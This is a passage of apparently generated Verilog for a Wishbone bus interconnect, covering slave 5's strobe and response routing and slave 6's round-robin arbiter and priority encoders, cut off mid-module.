    always @ (  ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd5 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd5 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd5 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd5 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd5 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd5 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd5 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd5 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s5_wb_stb_o = ( ( ( m0_slv_sel == 4'd5 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s5_wb_stb_o = ( ( ( m1_slv_sel == 4'd5 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s5_wb_stb_o = ( ( ( m2_slv_sel == 4'd5 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s5_wb_stb_o = ( ( ( m3_slv_sel == 4'd5 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s5_wb_stb_o = ( ( ( m4_slv_sel == 4'd5 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s5_wb_stb_o = ( ( ( m5_slv_sel == 4'd5 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s5_wb_stb_o = ( ( ( m6_slv_sel == 4'd5 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s5_wb_stb_o = ( ( ( m7_slv_sel == 4'd5 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s5_m0_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s5_ack_i );
    assign s5_m1_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s5_ack_i );
    assign s5_m2_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s5_ack_i );
    assign s5_m3_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s5_ack_i );
    assign s5_m4_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s5_ack_i );
    assign s5_m5_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s5_ack_i );
    assign s5_m6_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s5_ack_i );
    assign s5_m7_ack_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s5_ack_i );
    assign s5_m0_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s5_err_i );
    assign s5_m1_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s5_err_i );
    assign s5_m2_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s5_err_i );
    assign s5_m3_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s5_err_i );
    assign s5_m4_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s5_err_i );
    assign s5_m5_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s5_err_i );
    assign s5_m6_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s5_err_i );
    assign s5_m7_err_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s5_err_i );
    assign s5_m0_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s5_rty_i );
    assign s5_m1_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s5_rty_i );
    assign s5_m2_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s5_rty_i );
    assign s5_m3_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s5_rty_i );
    assign s5_m4_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s5_rty_i );
    assign s5_m5_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s5_rty_i );
    assign s5_m6_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s5_rty_i );
    assign s5_m7_rty_o = ( ( ( ( ( s5_pri_sel == 2'd0 ) ) ? ( s5_arb_state ) : ( ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( s5_msel_arb0_state ) : ( ( ( ( s5_msel_pri_sel == 2'd1 ) ) ? ( s5_msel_sel1 ) : ( s5_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s5_rty_i );
    assign s6_wb_data_i = s6_data_i;
    assign s6_data_o = s6_wb_data_o;
    assign s6_addr_o = s6_wb_addr_o;
    assign s6_sel_o = s6_wb_sel_o;
    assign s6_we_o = s6_wb_we_o;
    assign s6_cyc_o = s6_wb_cyc_o;
    assign s6_stb_o = s6_wb_stb_o;
    assign s6_wb_ack_i = s6_ack_i;
    assign s6_wb_err_i = s6_err_i;
    assign s6_wb_rty_i = s6_rty_i;
    always @ (  posedge clk_i)
    begin
        s6_next <=  ~( s6_wb_cyc_o);
    end
    assign s6_arb_req = { m7_s6_cyc_o, m6_s6_cyc_o, m5_s6_cyc_o, m4_s6_cyc_o, m3_s6_cyc_o, m2_s6_cyc_o, m1_s6_cyc_o, m0_s6_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s6_arb_state <= s6_arb_grant0;
        end
        else
        begin 
            s6_arb_state <= s6_arb_next_state;
        end
    end
    always @ (  s6_arb_state or  { m7_s6_cyc_o, m6_s6_cyc_o, m5_s6_cyc_o, m4_s6_cyc_o, m3_s6_cyc_o, m2_s6_cyc_o, m1_s6_cyc_o, m0_s6_cyc_o } or  1'b0)
    begin
        s6_arb_next_state = s6_arb_state;
        case ( s6_arb_state ) 
        s6_arb_grant0:
        begin
            if (  !( s6_arb_req[0]) | 1'b0 ) 
            begin
                if ( s6_arb_req[1] ) 
                begin
                    s6_arb_next_state = s6_arb_grant1;
                end
                else
                begin 
                    if ( s6_arb_req[2] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant2;
                    end
                    else
                    begin 
                        if ( s6_arb_req[3] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant3;
                        end
                        else
                        begin 
                            if ( s6_arb_req[4] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant4;
                            end
                            else
                            begin 
                                if ( s6_arb_req[5] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[6] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[7] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant1:
        begin
            if (  !( s6_arb_req[1]) | 1'b0 ) 
            begin
                if ( s6_arb_req[2] ) 
                begin
                    s6_arb_next_state = s6_arb_grant2;
                end
                else
                begin 
                    if ( s6_arb_req[3] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant3;
                    end
                    else
                    begin 
                        if ( s6_arb_req[4] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant4;
                        end
                        else
                        begin 
                            if ( s6_arb_req[5] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant5;
                            end
                            else
                            begin 
                                if ( s6_arb_req[6] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[7] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[0] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant2:
        begin
            if (  !( s6_arb_req[2]) | 1'b0 ) 
            begin
                if ( s6_arb_req[3] ) 
                begin
                    s6_arb_next_state = s6_arb_grant3;
                end
                else
                begin 
                    if ( s6_arb_req[4] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant4;
                    end
                    else
                    begin 
                        if ( s6_arb_req[5] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant5;
                        end
                        else
                        begin 
                            if ( s6_arb_req[6] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant6;
                            end
                            else
                            begin 
                                if ( s6_arb_req[7] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[0] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[1] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant3:
        begin
            if (  !( s6_arb_req[3]) | 1'b0 ) 
            begin
                if ( s6_arb_req[4] ) 
                begin
                    s6_arb_next_state = s6_arb_grant4;
                end
                else
                begin 
                    if ( s6_arb_req[5] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant5;
                    end
                    else
                    begin 
                        if ( s6_arb_req[6] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant6;
                        end
                        else
                        begin 
                            if ( s6_arb_req[7] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant7;
                            end
                            else
                            begin 
                                if ( s6_arb_req[0] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[1] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[2] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant4:
        begin
            if (  !( s6_arb_req[4]) | 1'b0 ) 
            begin
                if ( s6_arb_req[5] ) 
                begin
                    s6_arb_next_state = s6_arb_grant5;
                end
                else
                begin 
                    if ( s6_arb_req[6] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant6;
                    end
                    else
                    begin 
                        if ( s6_arb_req[7] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant7;
                        end
                        else
                        begin 
                            if ( s6_arb_req[0] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant0;
                            end
                            else
                            begin 
                                if ( s6_arb_req[1] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[2] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[3] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant5:
        begin
            if (  !( s6_arb_req[5]) | 1'b0 ) 
            begin
                if ( s6_arb_req[6] ) 
                begin
                    s6_arb_next_state = s6_arb_grant6;
                end
                else
                begin 
                    if ( s6_arb_req[7] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant7;
                    end
                    else
                    begin 
                        if ( s6_arb_req[0] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant0;
                        end
                        else
                        begin 
                            if ( s6_arb_req[1] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant1;
                            end
                            else
                            begin 
                                if ( s6_arb_req[2] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[3] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[4] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant6:
        begin
            if (  !( s6_arb_req[6]) | 1'b0 ) 
            begin
                if ( s6_arb_req[7] ) 
                begin
                    s6_arb_next_state = s6_arb_grant7;
                end
                else
                begin 
                    if ( s6_arb_req[0] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant0;
                    end
                    else
                    begin 
                        if ( s6_arb_req[1] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant1;
                        end
                        else
                        begin 
                            if ( s6_arb_req[2] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant2;
                            end
                            else
                            begin 
                                if ( s6_arb_req[3] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[4] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[5] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_arb_grant7:
        begin
            if (  !( s6_arb_req[7]) | 1'b0 ) 
            begin
                if ( s6_arb_req[0] ) 
                begin
                    s6_arb_next_state = s6_arb_grant0;
                end
                else
                begin 
                    if ( s6_arb_req[1] ) 
                    begin
                        s6_arb_next_state = s6_arb_grant1;
                    end
                    else
                    begin 
                        if ( s6_arb_req[2] ) 
                        begin
                            s6_arb_next_state = s6_arb_grant2;
                        end
                        else
                        begin 
                            if ( s6_arb_req[3] ) 
                            begin
                                s6_arb_next_state = s6_arb_grant3;
                            end
                            else
                            begin 
                                if ( s6_arb_req[4] ) 
                                begin
                                    s6_arb_next_state = s6_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s6_arb_req[5] ) 
                                    begin
                                        s6_arb_next_state = s6_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s6_arb_req[6] ) 
                                        begin
                                            s6_arb_next_state = s6_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s6_msel_req = { m7_s6_cyc_o, m6_s6_cyc_o, m5_s6_cyc_o, m4_s6_cyc_o, m3_s6_cyc_o, m2_s6_cyc_o, m1_s6_cyc_o, m0_s6_cyc_o };
    assign s6_msel_pri_enc_valid = { m7_s6_cyc_o, m6_s6_cyc_o, m5_s6_cyc_o, m4_s6_cyc_o, m3_s6_cyc_o, m2_s6_cyc_o, m1_s6_cyc_o, m0_s6_cyc_o };
    always @ (  s6_msel_pri_enc_valid[0] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[0]) ) 
        begin
            s6_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[0] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[0]) ) 
        begin
            s6_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[1] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[1]) ) 
        begin
            s6_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[1] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[1]) ) 
        begin
            s6_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[2] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[2]) ) 
        begin
            s6_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[2] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[2]) ) 
        begin
            s6_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[3] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[3]) ) 
        begin
            s6_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
